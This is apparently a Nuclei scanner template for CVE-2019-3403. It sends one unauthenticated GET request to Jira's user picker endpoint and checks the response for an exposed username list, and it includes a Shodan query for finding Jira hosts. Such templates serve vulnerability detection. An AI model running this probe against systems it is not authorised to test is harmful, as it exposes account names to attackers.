id: CVE-2019-3403

info:
  name: User enumeration via an incorrect authorisation check
  author: Ganofins
  severity: medium
  description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-69242
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-3403
    cwe-id: CWE-863
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2019,atlassian,jira,enumeration

requests:
  - method: GET
    path:
      - "{{BaseURL}}/rest/api/2/user/picker?query="

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"users":'
          - '"total":'
          - '"header":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200